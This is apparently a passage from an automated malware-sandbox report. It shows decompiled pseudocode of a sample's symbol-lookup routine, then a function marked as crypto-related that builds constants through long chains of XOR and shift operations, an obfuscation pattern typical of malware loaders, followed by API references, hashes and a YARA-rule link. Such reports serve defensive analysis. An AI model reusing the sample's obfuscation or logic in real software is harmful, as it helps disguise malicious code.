										 *(_t418 + 0x18) = _t281 & 0xffff0000;
										__eflags = (_t412 & 0x0000f800) - 0xd800;
										if((_t412 & 0x0000f800) != 0xd800) {
											_t357 = _t412 & 0x0000ffff;
											_t384 = 0;
										} else {
											_t357 = 0;
											_t384 = 1;
											__eflags = (_t412 & 0x0000ffff) - 0xdbff;
											if((_t412 & 0x0000ffff) <= 0xdbff) {
												_t317 =  *(_t418 + 0xc);
												_t293 =  *(_t418 + 0x30);
												__eflags = _t317 - _t293;
												if(_t317 == _t293) {
													 *(_t418 + 0xc) = _t293;
												} else {
													_t294 =  *_t317 & 0x0000ffff;
													 *(_t418 + 0xc) =  &(_t317[1]);
													__eflags = (_t294 & 0x0000fc00) - 0xdc00;
													if((_t294 & 0x0000fc00) != 0xdc00) {
														_t297 = (_t294 & 0x0000ffff) << 0x00000010 | 0x00000001;
														__eflags = _t297;
														 *(_t418 + 0x18) = _t297;
													} else {
														_t384 = 0;
														_t357 = (_t294 + 0x00002400 & 0x0000ffff | (_t412 + 0x00002800 & 0x0000ffff) << 0x0000000a) + 0x10000;
													}
												}
											}
											_t312 =  *(_t418 + 0x14);
										}
										__eflags = _t384 & 0x00000001;
										_t385 = 1;
										_t358 =  !=  ? 0xfffd : _t357;
										_t290 =  *(_t418 + 0x28);
										__eflags = _t358 - 0x80;
										if(_t358 >= 0x80) {
											_t385 = 2;
											__eflags = _t358 - 0x800;
											if(_t358 >= 0x800) {
												__eflags = _t358 - 0x10000;
												_t385 = 4;
												asm("sbb edx, 0x0");
											}
										}
										_t408 = _t290 - _t385;
										__eflags = _t408;
										if(_t408 > 0) {
											 *(_t418 + 0x24) = _t385;
											 *(_t418 + 0x34) = _t408;
											 *(_t418 + 0x11a8) = 0;
											E6ECDDD00(_t312, _t358,  *(_t418 + 0x1c), _t408, _t418, _t421, _t290);
											_t424 = _t424 + 4;
											_t292 =  *(_t418 + 0x24);
											_t408 =  *(_t418 + 0x34);
											_t312 =  *(_t418 + 0x14);
											_t379 =  *(_t418 + 0x30);
											 *(_t418 + 0x20) =  *(_t418 + 0x20) + _t292;
											_t281 =  *(_t418 + 0x18);
											__eflags = _t281;
											 *(_t418 + 0x1c) =  *(_t418 + 0x1c) + _t292;
											 *(_t418 + 0x28) =  *(_t418 + 0x34);
											if(_t281 != 0) {
												goto L12;
											} else {
												goto L13;
											}
										}
									}
									__eflags =  *(_t418 + 0x20) - 0x101;
									if(__eflags >= 0) {
										 *(_t418 + 0x11a8) = 0;
										E6ECF6DB0(_t312,  *(_t418 + 0x20), 0x100, _t408, _t418, __eflags, 0x6ed1e1dc);
										goto L87;
									} else {
										_t409 =  *0x6ed2adf4; // 0x0
										asm("xorps xmm0, xmm0");
										 *(_t418 + 0x74) = 0;
										 *(_t418 + 0x70) = 0;
										asm("movaps [esi+0x60], xmm0");
										 *((intOrPtr*)(_t418 + 0x60)) = 0x18;
										__eflags = _t409;
										if(_t409 != 0) {
											L59:
											_t283 = GetCurrentProcess();
											_t350 = _t418 + 0x60;
											 *(_t418 + 0x38) = 0;
											_t381 = _t418 + 0x38;
											_t284 =  *_t409(_t283, _t312, 0, _t381, _t350);
											__eflags = _t284 - 1;
											if(_t284 != 1) {
												_t410 = 0;
												__eflags = 0;
											} else {
												_t284 =  *((intOrPtr*)(_t418 + 0x68));
												_t350 =  *((intOrPtr*)(_t418 + 0x6c));
												_t411 = 0;
												__eflags = 0;
												asm("o16 nop [cs:eax+eax]");
												do {
													_t381 = _t411;
													_t411 = _t411 + 1;
													__eflags =  *((short*)(_t350 + _t381 * 2));
												} while ( *((short*)(_t350 + _t381 * 2)) != 0);
												 *(_t418 + 0x11a8) = 0;
												_t410 = 1;
											}
											 *(_t418 + 0x11a8) = 0;
											 *(_t418 + 0x38) = _t418 + 0xa0;
											 *(_t418 + 0x3c) =  *(_t418 + 0x20);
											 *((intOrPtr*)(_t418 + 0x40)) =  *((intOrPtr*)(_t418 + 0x1d8));
											 *(_t418 + 0x44) = _t410;
											 *((intOrPtr*)(_t418 + 0x48)) = _t284;
											 *(_t418 + 0x4c) = _t410;
											 *((intOrPtr*)(_t418 + 0x50)) = _t350;
											 *(_t418 + 0x54) = _t381;
											E6ECDFA10(_t418 + 0x84, _t418 + 0x38);
											goto L75;
										} else {
											_t286 = GetProcAddress( *0x6ed2add0, "SymGetLineFromAddrW64");
											__eflags = _t286;
											if(__eflags == 0) {
												 *(_t418 + 0x11a8) = 0;
												E6ECF6E20(_t312, "called `Option::unwrap()` on a `None` value", 0x2b, _t409, _t418, __eflags, 0x6ed1e2c0);
												goto L87;
											} else {
												_t409 = _t286;
												 *0x6ed2adf4 = _t286;
												goto L59;
											}
										}
									}
								}
							} else {
								_t298 = GetProcAddress( *0x6ed2add0, "SymFromAddrW");
								__eflags = _t298;
								if(__eflags == 0) {
									 *(_t418 + 0x11a8) = 0;
									E6ECF6E20(_t312, "called `Option::unwrap()` on a `None` value", 0x2b, _t407, _t418, __eflags, 0x6ed1e2c0);
									L87:
									asm("ud2");
									asm("o16 nop [eax+eax]");
									_push(_t421);
									return E6ECDE880( *((intOrPtr*)( &_v4528 + 0x2c)));
								} else {
									_t407 = _t298;
									 *0x6ed2adf0 = _t298;
									goto L9;
								}
							}
						}
					} else {
						if( *((char*)(_t418 + 0x13)) == 0) {
							L76:
							__eflags =  *(_t418 + 0x12);
							if( *(_t418 + 0x12) == 0) {
								__eflags =  *((char*)( *((intOrPtr*)(_t418 + 0x7c))));
								if( *((char*)( *((intOrPtr*)(_t418 + 0x7c)))) != 0) {
									 *(_t418 + 0x38) =  *((intOrPtr*)(_t418 + 0x78));
									 *(_t418 + 0x3c) = 0;
									 *(_t418 + 0x1a8) = 4;
									 *(_t418 + 0xa0) = 2;
									 *(_t418 + 0x11a8) = 1;
									_push(0);
									_push(_t418 + 0xa0);
									_push(_t418 + 0x1a0);
									 *( *(_t418 + 0x58)) = E6ECDF250(_t418 + 0x38,  *((intOrPtr*)( *((intOrPtr*)(_t418 + 0x5c)) + 8)));
									_t249 =  *(_t418 + 0x38);
									_t202 = _t249 + 4;
									 *_t202 =  *(_t249 + 4) + 1;
									__eflags =  *_t202;
								}
							}
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t418 + 0x80)) + 4)))) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t418 + 0x80)) + 4)))) + 1;
							_t243 =  *(_t418 + 0x58);
							__eflags =  *_t243;
							_t208 =  *_t243 == 0;
							__eflags = _t208;
							_t240 = _t243 & 0xffffff00 | _t208;
						} else {
							goto L4;
						}
						goto L80;
					}
				} else {
					L4:
					_t240 = 0;
					L80:
					 *[fs:0x0] =  *((intOrPtr*)(_t418 + 0x11a0));
					return _t240;
				}
			}
















































































                          0x6ecde890
                          0x6ecde890
                          0x6ecde893
                          0x6ecde894
                          0x6ecde895
                          0x6ecde896
                          0x6ecde89e
                          0x6ecde8a3
                          0x6ecde8a5
                          0x6ecde8ab
                          0x6ecde8b1
                          0x6ecde8bb
                          0x6ecde8d2
                          0x6ecde8d8
                          0x6ecde8de
                          0x6ecde8e1
                          0x6ecde8e6
                          0x6ecde8f0
                          0x6ecde8f3
                          0x6ecde8f6
                          0x6ecde8fc
                          0x6ecde8ff
                          0x6ecde902
                          0x6ecde905
                          0x6ecde909
                          0x6ecde90d
                          0x6ecde913
                          0x6ecde91c
                          0x6ecde922
                          0x6ecde92b
                          0x6ecde931
                          0x6ecde937
                          0x6ecde93a
                          0x6ecde93d
                          0x6ecde940
                          0x6ecde94d
                          0x6ecde960
                          0x6ecde963
                          0x6ecde96b
                          0x6ecde96e
                          0x6ecdec18
                          0x6ecdec1d
                          0x6ecdec20
                          0x6ecdec26
                          0x6ecdec30
                          0x6ecdec3a
                          0x6ecdec3c
                          0x6ecdec5e
                          0x6ecdec5e
                          0x6ecdec66
                          0x6ecdec6c
                          0x6ecdec77
                          0x6ecdec81
                          0x6ecdec8e
                          0x6ecdec99
                          0x6ecdec9f
                          0x6ecdeca6
                          0x6ecdeca8
                          0x6ecdecab
                          0x00000000
                          0x6ecdecb1
                          0x6ecdecb7
                          0x6ecdecbd
                          0x6ecdecc0
                          0x6ecdecc6
                          0x6ecdeccc
                          0x6ecdecd3
                          0x6ecdecda
                          0x6ecdece1
                          0x6ecdece8
                          0x6ecdecef
                          0x6ecdecf6
                          0x6ecdecfd
                          0x6ecded04
                          0x6ecded0b
                          0x6ecded12
                          0x6ecded19
                          0x6ecded20
                          0x6ecded27
                          0x6ecded2e
                          0x6ecded35
                          0x6ecded3c
                          0x6ecded43
                          0x6ecded44
                          0x6ecded46
                          0x6ecded50
                          0x6ecded52
                          0x6ecded5a
                          0x6ecded5d
                          0x6ecded60
                          0x6ecded80
                          0x6ecded80
                          0x6ecded83
                          0x6ecded89
                          0x6ecded8b
                          0x6ecded8b
                          0x6ecded8e
                          0x00000000
                          0x6ecded8e
                          0x6ecded62
                          0x6ecded62
                          0x6ecded70
                          0x6ecded72
                          0x6ecded91
                          0x6ecded9e
                          0x6ecdeda1
                          0x6ecdeda6
                          0x6ecdedc0
                          0x6ecdedc3
                          0x6ecdedc6
                          0x6ecdeda8
                          0x6ecdeda8
                          0x6ecdedad
                          0x6ecdedaf
                          0x6ecdedb5
                          0x6ecdedd0
                          0x6ecdedd3
                          0x6ecdedd5
                          0x6ecdee15
                          0x00000000
                          0x6ecdedd7
                          0x6ecdedd7
                          0x6ecdeddd
                          0x6ecdede0
                          0x6ecdede9
                          0x6ecdedef
                          0x6ecdee24
                          0x6ecdee27
                          0x00000000
                          0x6ecdedf1
                          0x6ecdee0b
                          0x6ecdee0d
                          0x6ecdee0d
                          0x6ecdedef
                          0x6ecdedb7
                          0x6ecdedb7
                          0x6ecdee30
                          0x6ecdee30
                          0x6ecdee30
                          0x6ecdedb5
                          0x6ecdee35
                          0x6ecdee38
                          0x6ecdee3f
                          0x6ecdee44
                          0x6ecdee47
                          0x6ecdee4d
                          0x6ecdee4f
                          0x6ecdee54
                          0x6ecdee5a
                          0x6ecdee5c
                          0x6ecdee62
                          0x6ecdee67
                          0x6ecdee67
                          0x6ecdee5a
                          0x6ecdee6c
                          0x6ecdee6c
                          0x6ecdee6e
                          0x6ecdee71
                          0x6ecdee77
                          0x6ecdee7a
                          0x6ecdee85
                          0x6ecdee88
                          0x6ecdee8d
                          0x6ecdee90
                          0x6ecdee96
                          0x6ecdee99
                          0x6ecdee9c
                          0x6ecdee9e
                          0x6ecdeea4
                          0x6ecdeea7
                          0x6ecdeeaa
                          0x00000000
                          0x6ecdeeb0
                          0x00000000
                          0x6ecdeeb0
                          0x6ecdeeaa
                          0x6ecdee71
                          0x6ecdef5e
                          0x6ecdef65
                          0x6ecdf15a
                          0x6ecdf16e
                          0x00000000
                          0x6ecdef6b
                          0x6ecdef6b
                          0x6ecdef71
                          0x6ecdef74
                          0x6ecdef7b
                          0x6ecdef82
                          0x6ecdef86
                          0x6ecdef8d
                          0x6ecdef8f
                          0x6ecdefb1
                          0x6ecdefb1
                          0x6ecdefb6
                          0x6ecdefb9
                          0x6ecdefc0
                          0x6ecdefd2
                          0x6ecdefd4
                          0x6ecdefd7
                          0x6ecdf04e
                          0x6ecdf04e
                          0x6ecdefd9
                          0x6ecdefd9
                          0x6ecdefdc
                          0x6ecdefdf
                          0x6ecdefdf
                          0x6ecdefe1
                          0x6ecdeff0
                          0x6ecdeff0
                          0x6ecdeff2
                          0x6ecdeff3
                          0x6ecdeff3
                          0x6ecdeffa
                          0x6ecdf004
                          0x6ecdf004
                          0x6ecdf056
                          0x6ecdf060
                          0x6ecdf066
                          0x6ecdf06f
                          0x6ecdf072
                          0x6ecdf075
                          0x6ecdf078
                          0x6ecdf07b
                          0x6ecdf07e
                          0x6ecdf08a
                          0x00000000
                          0x6ecdef91
                          0x6ecdef9c
                          0x6ecdefa2
                          0x6ecdefa4
                          0x6ecdf1e4
                          0x6ecdf1fd
                          0x00000000
                          0x6ecdefaa
                          0x6ecdefaa
                          0x6ecdefac
                          0x00000000
                          0x6ecdefac
                          0x6ecdefa4
                          0x6ecdef8f
                          0x6ecdef65
                          0x6ecdec3e
                          0x6ecdec49
                          0x6ecdec4f
                          0x6ecdec51
                          0x6ecdf19e
                          0x6ecdf1b7
                          0x00000000
                          0x6ecdec57
                          0x6ecdec57
                          0x6ecdec59
                          0x00000000
                          0x6ecdec59
                          0x6ecdec51
                          0x6ecde974
                          0x6ecde974
                          0x6ecde985
                          0x6ecde98a
                          0x6ecde98d
                          0x6ecde993
                          0x6ecde99d
                          0x6ecde9a7
                          0x6ecde9a9
                          0x6ecde9cb
                          0x6ecde9cb
                          0x6ecde9d6
                          0x6ecde9e0
                          0x6ecde9f6
                          0x6ecde9f8
                          0x6ecde9fb
                          0x6ecdf08f
                          0x6ecdf093
                          0x6ecdf098
                          0x6ecdf09c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6ecdea01
                          0x6ecdea07
                          0x6ecdea0d
                          0x6ecdea10
                          0x6ecdea15
                          0x6ecdea1c
                          0x6ecdea1f
                          0x6ecdea26
                          0x6ecdea2d
                          0x6ecdea34
                          0x6ecdea3b
                          0x6ecdea42
                          0x6ecdea49
                          0x6ecdea50
                          0x6ecdea57
                          0x6ecdea5e
                          0x6ecdea65
                          0x6ecdea6c
                          0x6ecdea73
                          0x6ecdea7a
                          0x6ecdea81
                          0x6ecdea88
                          0x6ecdea8f
                          0x6ecdea90
                          0x6ecdea92
                          0x6ecdea9b
                          0x6ecdeaa2
                          0x6ecdeaa5
                          0x6ecdeaad
                          0x6ecdeab0
                          0x6ecdeab3
                          0x6ecdeab6
                          0x6ecdeab9
                          0x6ecdead0
                          0x6ecdead0
                          0x6ecdead3
                          0x6ecdead9
                          0x6ecdeadc
                          0x6ecdeadf
                          0x6ecdeadf
                          0x6ecdeae2
                          0x00000000
                          0x6ecdeae2
                          0x6ecdeac0
                          0x6ecdeac0
                          0x6ecdeac2
                          0x6ecdeae5
                          0x6ecdeaf2
                          0x6ecdeaf5
                          0x6ecdeafb
                          0x6ecdeb60
                          0x6ecdeb63
                          0x6ecdeafd
                          0x6ecdeb00
                          0x6ecdeb02
                          0x6ecdeb07
                          0x6ecdeb0d
                          0x6ecdeb0f
                          0x6ecdeb12
                          0x6ecdeb15
                          0x6ecdeb17
                          0x6ecdeb67
                          0x6ecdeb19
                          0x6ecdeb19
                          0x6ecdeb1f
                          0x6ecdeb2a
                          0x6ecdeb30
                          0x6ecdeb72
                          0x6ecdeb72
                          0x6ecdeb75
                          0x6ecdeb32
                          0x6ecdeb49
                          0x6ecdeb4b
                          0x6ecdeb4b
                          0x6ecdeb30
                          0x6ecdeb17
                          0x6ecdeb80
                          0x6ecdeb80
                          0x6ecdeb83
                          0x6ecdeb8b
                          0x6ecdeb90
                          0x6ecdeb93
                          0x6ecdeb96
                          0x6ecdeb9c
                          0x6ecdeb9e
                          0x6ecdeba3
                          0x6ecdeba9
                          0x6ecdebab
                          0x6ecdebb1
                          0x6ecdebb6
                          0x6ecdebb6
                          0x6ecdeba9
                          0x6ecdebbb
                          0x6ecdebbb
                          0x6ecdebbd
                          0x6ecdebc3
                          0x6ecdebc9
                          0x6ecdebcc
                          0x6ecdebd7
                          0x6ecdebdc
                          0x6ecdebdf
                          0x6ecdebe5
                          0x6ecdebe8
                          0x6ecdebeb
                          0x6ecdebf0
                          0x6ecdebf3
                          0x6ecdebf6
                          0x6ecdebf9
                          0x6ecdebfc
                          0x6ecdebff
                          0x00000000
                          0x6ecdec05
                          0x00000000
                          0x6ecdec05
                          0x6ecdebff
                          0x6ecdebbd
                          0x6ecdeeb5
                          0x6ecdeebc
                          0x6ecdf136
                          0x6ecdf14a
                          0x00000000
                          0x6ecdeec2
                          0x6ecdeec2
                          0x6ecdeec8
                          0x6ecdeecb
                          0x6ecdeed2
                          0x6ecdeed9
                          0x6ecdeedd
                          0x6ecdeee4
                          0x6ecdeee6
                          0x6ecdef08
                          0x6ecdef08
                          0x6ecdef0d
                          0x6ecdef10
                          0x6ecdef17
                          0x6ecdef20
                          0x6ecdef22
                          0x6ecdef25
                          0x6ecdf00b
                          0x6ecdf00b
                          0x6ecdef2b
                          0x6ecdef2b
                          0x6ecdef2e
                          0x6ecdef31
                          0x6ecdef31
                          0x6ecdef33
                          0x6ecdef40
                          0x6ecdef40
                          0x6ecdef42
                          0x6ecdef43
                          0x6ecdef43
                          0x6ecdef4a
                          0x6ecdef54
                          0x6ecdef54
                          0x6ecdf013
                          0x6ecdf01d
                          0x6ecdf023
                          0x6ecdf02c
                          0x6ecdf02f
                          0x6ecdf032
                          0x6ecdf035
                          0x6ecdf038
                          0x6ecdf03b
                          0x6ecdf047
                          0x00000000
                          0x6ecdeee8
                          0x6ecdeef3
                          0x6ecdeef9
                          0x6ecdeefb
                          0x6ecdf1c1
                          0x6ecdf1da
                          0x00000000
                          0x6ecdef01
                          0x6ecdef01
                          0x6ecdef03
                          0x00000000
                          0x6ecdef03
                          0x6ecdeefb
                          0x6ecdeee6
                          0x6ecdeebc
                          0x6ecde9ab
                          0x6ecde9b6
                          0x6ecde9bc
                          0x6ecde9be
                          0x6ecdf17b
                          0x6ecdf194
                          0x6ecdf205
                          0x6ecdf205
                          0x6ecdf207
                          0x6ecdf210
                          0x6ecdf22c
                          0x6ecde9c4
                          0x6ecde9c4
                          0x6ecde9c6
                          0x00000000
                          0x6ecde9c6
                          0x6ecde9be
                          0x6ecde9a9
                          0x6ecde94f
                          0x6ecde953
                          0x6ecdf0a2
                          0x6ecdf0a2
                          0x6ecdf0a6
                          0x6ecdf0ab
                          0x6ecdf0ae
                          0x6ecdf0b3
                          0x6ecdf0b9
                          0x6ecdf0c3
                          0x6ecdf0cd
                          0x6ecdf0d7
                          0x6ecdf0f3
                          0x6ecdf0f5
                          0x6ecdf0f6
                          0x6ecdf102
                          0x6ecdf104
                          0x6ecdf107
                          0x6ecdf107
                          0x6ecdf107
                          0x6ecdf107
                          0x6ecdf0ae
                          0x6ecdf113
                          0x6ecdf115
                          0x6ecdf118
                          0x6ecdf11b
                          0x6ecdf11b
                          0x6ecdf11b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6ecde953
                          0x6ecde959
                          0x6ecde959
                          0x6ecde959
                          0x6ecdf11e
                          0x6ecdf124
                          0x6ecdf132
                          0x6ecdf132

                          APIs
                          • GetProcAddress.KERNEL32(SymFromAddrW), ref: 6ECDE9B6
                          • GetCurrentProcess.KERNEL32 ref: 6ECDE9CB
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressCurrentProcProcess
                          • String ID: SymFromAddrW$SymFromInlineContextW$SymGetLineFromAddrW64$SymGetLineFromInlineContextW$called `Option::unwrap()` on a `None` value
                          • API String ID: 3217270580-808744031
                          • Opcode ID: 481959f7864acc890fb517d91814e3a86014f0ee868d99e6db31506c0d77eaf2
                          • Instruction ID: 0d96088369e6aa3221eb9d460715116b6ae3b7595cbafac5aa78a013f48a8764
                          • Opcode Fuzzy Hash: 481959f7864acc890fb517d91814e3a86014f0ee868d99e6db31506c0d77eaf2
                          • Instruction Fuzzy Hash: A9425A70904B409FE7258F69C890BE2B7F5FF48314F10492ED69A87A50E776B489CB81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0111A29B, Relevance: 21.8, Strings: 17, Instructions: 560COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 93%
                          			E0111A29B(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				void* _t595;
				void* _t630;
				void* _t632;
				void* _t634;
				void* _t638;
				void* _t647;
				intOrPtr _t659;
				intOrPtr _t660;
				signed int _t667;
				signed int _t668;
				signed int _t669;
				signed int _t670;
				signed int _t671;
				signed int _t672;
				signed int _t673;
				signed int _t674;
				void* _t675;
				void* _t691;
				void* _t714;
				intOrPtr _t731;
				void* _t733;
				void* _t736;
				void* _t737;
				void* _t738;
				void* _t743;

				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0x20);
				_push(__ecx);
				E0110358A(_t595);
				_v20 = 0xf327e8;
				_t738 = _t737 + 0x20;
				asm("stosd");
				_t736 = 0;
				_t660 = 0x1be4ce1;
				asm("stosd");
				_t667 = 0x1c;
				asm("stosd");
				_v128 = 0xb5779c;
				_v128 = _v128 + 0xdde6;
				_v128 = _v128 ^ 0x00b65582;
				_v212 = 0xab8b7;
				_v212 = _v212 << 5;
				_v212 = _v212 + 0x285b;
				_v212 = _v212 ^ 0x01573f3b;
				_v108 = 0xf1b95;
				_v108 = _v108 << 1;
				_v108 = _v108 ^ 0x001e372a;
				_v236 = 0xd3c766;
				_v236 = _v236 ^ 0x4c35dda4;
				_v236 = _v236 ^ 0xf4ac62e6;
				_v236 = _v236 + 0xac1a;
				_v236 = _v236 ^ 0xb84b243e;
				_v264 = 0x4c8acc;
				_v264 = _v264 | 0x6b972bec;
				_v264 = _v264 * 0x11;
				_v264 = _v264 | 0x4439188c;
				_v264 = _v264 ^ 0x6dfb7aac;
				_v272 = 0x7452f1;
				_v272 = _v272 | 0xadfdffff;
				_v272 = _v272 << 4;
				_v272 = _v272 ^ 0xdfdffff0;
				_v256 = 0xc9874e;
				_v256 = _v256 ^ 0xb0d5c9db;
				_v256 = _v256 ^ 0x60dd3951;
				_v256 = _v256 / _t667;
				_v256 = _v256 ^ 0x07749fb4;
				_v196 = 0x14df4d;
				_v196 = _v196 >> 0xf;
				_v196 = _v196 * 0x62;
				_v196 = _v196 ^ 0x00000fb2;
				_v124 = 0x1fc85;
				_v124 = _v124 + 0xffff9683;
				_v124 = _v124 ^ 0x00019308;
				_v148 = 0xf728c3;
				_v148 = _v148 ^ 0x410bb6ca;
				_v148 = _v148 << 8;
				_v148 = _v148 ^ 0xfc9e0900;
				_v80 = 0xcdef16;
				_v80 = _v80 * 0x69;
				_v80 = _v80 ^ 0x54771006;
				_v64 = 0xcfcda1;
				_v64 = _v64 ^ 0x1349c91b;
				_v64 = _v64 ^ 0x138604ba;
				_v284 = 0x1cf0f9;
				_v284 = _v284 ^ 0x257fade6;
				_v284 = _v284 | 0x51678028;
				_t668 = 0x61;
				_v284 = _v284 / _t668;
				_v284 = _v284 ^ 0x013e0a7b;
				_v84 = 0xee9046;
				_v84 = _v84 + 0xb1b5;
				_v84 = _v84 ^ 0x00eb8e5c;
				_v260 = 0x4d980b;
				_v260 = _v260 << 0xa;
				_v260 = _v260 >> 1;
				_v260 = _v260 | 0xa6abb1dd;
				_v260 = _v260 ^ 0xbfb20ec1;
				_v48 = 0x20a9bf;
				_v48 = _v48 | 0x0eca1706;
				_v48 = _v48 ^ 0x0ee5895d;
				_v224 = 0x8ed0c5;
				_v224 = _v224 + 0xffff1116;
				_v224 = _v224 + 0xe7c9;
				_v224 = _v224 ^ 0x0086e7c0;
				_v184 = 0x1f6a81;
				_v184 = _v184 + 0xffffdf2c;
				_v184 = _v184 | 0xaf0f166a;
				_v184 = _v184 ^ 0xaf1d3044;
				_v244 = 0xe53cb3;
				_v244 = _v244 >> 1;
				_v244 = _v244 + 0xffff7d9e;
				_v244 = _v244 | 0xc5e9b062;
				_v244 = _v244 ^ 0xc5f7f4ed;
				_v220 = 0x94efff;
				_v220 = _v220 + 0xfffff1fc;
				_v220 = _v220 >> 8;
				_v220 = _v220 ^ 0x000e7487;
				_v132 = 0xfeceee;
				_v132 = _v132 << 0x10;
				_v132 = _v132 ^ 0xcee5fb97;
				_v252 = 0x7f7476;
				_v252 = _v252 + 0xffffb7fa;
				_v252 = _v252 + 0xffffd497;
				_t669 = 0x3b;
				_v252 = _v252 / _t669;
				_v252 = _v252 ^ 0x000bee5d;
				_v228 = 0x86e191;
				_v228 = _v228 ^ 0x47ba048e;
				_t670 = 0x46;
				_v228 = _v228 * 0x61;
				_v228 = _v228 ^ 0xfe16436a;
				_v276 = 0x9f0763;
				_v276 = _v276 * 0x61;
				_v276 = _v276 >> 2;
				_v276 = _v276 >> 1;
				_v276 = _v276 ^ 0x078e7242;
				_v204 = 0x7ace55;
				_v204 = _v204 | 0x549f47c2;
				_v204 = _v204 + 0x3ce1;
				_v204 = _v204 ^ 0x55057257;
				_v112 = 0x668a76;
				_v112 = _v112 ^ 0xa303abbe;
				_v112 = _v112 ^ 0xa369580c;
				_v304 = 0xea9dc2;
				_v304 = _v304 | 0x61facf16;
				_v304 = _v304 >> 9;
				_v304 = _v304 << 9;
				_v304 = _v304 ^ 0x61fdd091;
				_v312 = 0x8bf4e;
				_v312 = _v312 + 0x76f7;
				_v312 = _v312 / _t670;
				_v312 = _v312 >> 4;
				_v312 = _v312 ^ 0x0009727a;
				_v120 = 0x784345;
				_v120 = _v120 << 0xe;
				_v120 = _v120 ^ 0x10d533d6;
				_v144 = 0xc8ca07;
				_v144 = _v144 << 0xd;
				_v144 = _v144 ^ 0x194ee9c4;
				_v68 = 0x367751;
				_v68 = _v68 << 0x10;
				_v68 = _v68 ^ 0x775c05ef;
				_v208 = 0xe91d48;
				_t671 = 0x7b;
				_v208 = _v208 / _t671;
				_v208 = _v208 ^ 0xbf924638;
				_v208 = _v208 ^ 0xbf9514f1;
				_v300 = 0xb4f1a1;
				_v300 = _v300 + 0xed19;
				_v300 = _v300 + 0xcea7;
				_v300 = _v300 + 0xffffe1f1;
				_v300 = _v300 ^ 0x00bf2b0f;
				_v100 = 0xb064ad;
				_v100 = _v100 + 0x9df9;
				_v100 = _v100 ^ 0x00b08fdc;
				_v168 = 0xbb40c5;
				_v168 = _v168 ^ 0xb00c62cf;
				_v168 = _v168 | 0xf2e647c5;
				_v168 = _v168 ^ 0xf2fdbde9;
				_v52 = 0x295953;
				_t273 =  &_v52; // 0x295953
				_t672 = 0x30;
				_v52 =  *_t273 * 7;
				_v52 = _v52 ^ 0x0126faa9;
				_v200 = 0x2413c;
				_v200 = _v200 + 0x8dfd;
				_v200 = _v200 ^ 0x3e6fa0dc;
				_v200 = _v200 ^ 0x3e61213f;
				_v268 = 0xbf579f;
				_v268 = _v268 | 0x94a3124e;
				_v268 = _v268 + 0x5b36;
				_v268 = _v268 ^ 0x910745d1;
				_v268 = _v268 ^ 0x05bc7083;
				_v152 = 0x55d14e;
				_v152 = _v152 + 0x80df;
				_v152 = _v152 >> 0xa;
				_v152 = _v152 ^ 0x00052a90;
				_v92 = 0x1560b9;
				_v92 = _v92 / _t672;
				_v92 = _v92 ^ 0x0005217c;
				_v60 = 0xbebd72;
				_t673 = 0x39;
				_v60 = _v60 * 0x71;
				_v60 = _v60 ^ 0x543d4f6d;
				_v192 = 0x306d18;
				_v192 = _v192 >> 1;
				_v192 = _v192 | 0xe6a9074b;
				_v192 = _v192 ^ 0xe6befa7f;
				_v96 = 0x3b01c7;
				_v96 = _v96 / _t673;
				_v96 = _v96 ^ 0x000f61bf;
				_v104 = 0x4d95b3;
				_v104 = _v104 + 0xabeb;
				_v104 = _v104 ^ 0x0046ffda;
				_v296 = 0x26e6f2;
				_v296 = _v296 + 0xc249;
				_v296 = _v296 * 0x61;
				_v296 = _v296 ^ 0x81098a9a;
				_v296 = _v296 ^ 0x8e08e7bd;
				_v188 = 0xd71c43;
				_v188 = _v188 << 0x10;
				_v188 = _v188 ^ 0x4cd6b411;
				_v188 = _v188 ^ 0x509ea514;
				_v88 = 0x9df4f3;
				_v88 = _v88 ^ 0xfb4fb186;
				_v88 = _v88 ^ 0xfbd91614;
				_v172 = 0x58d00f;
				_v172 = _v172 | 0xc5f9e837;
				_v172 = _v172 ^ 0x5c8ab005;
				_v172 = _v172 ^ 0x997bd2d4;
				_v180 = 0xaa9a47;
				_v180 = _v180 << 9;
				_v180 = _v180 << 0xe;
